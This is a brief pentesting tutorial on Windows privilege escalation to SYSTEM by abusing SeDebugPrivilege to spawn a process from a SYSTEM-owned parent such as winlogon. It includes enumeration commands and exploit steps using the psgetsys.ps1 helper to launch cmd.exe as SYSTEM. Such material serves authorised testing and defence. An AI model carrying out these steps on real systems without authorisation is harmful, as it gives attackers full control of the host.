SYSTEM parent process abuse uses debug rights and process creation behavior to spawn a process from a SYSTEM-owned parent.
This is local privilege escalation to SYSTEM when the current process has usable debug rights and the target process can be opened.
When enumerating this path, try to identify:
SeDebugPrivilegein the current token- High-integrity execution context
- Suitable SYSTEM parent process
- Endpoint controls around parent process spoofing
- Payload path and command line
Enumeration
List SYSTEM processes:
tasklist /v | findstr /i "SYSTEM"
Check privilege:
whoami /priv
Interesting findings include:
- SYSTEM process PID is available
- Debug privilege is enabled or can be enabled
- Target process can be opened
- Child process creation is not blocked
Once a suitable parent process is selected, use a helper that creates a process from that parent.
Exploit
Tools such as psgetsystem use debug access and parent process creation behavior to start a process from a SYSTEM-owned parent.
- Identify a SYSTEM process PID.
tasklist /v | findstr /i "SYSTEM"
- Import the helper.
Import-Module .\psgetsys.ps1
- Create a process from the SYSTEM parent.
[MyProcess]::CreateProcessFromParent(<SYSTEM_PID>, "C:\Windows\System32\cmd.exe", "")
Alternative helper function:
ImpersonateFromParentPid -ppid (Get-Process winlogon).Id -command "C:\Windows\System32\cmd.exe"
- Verify context.
whoami
whoami /priv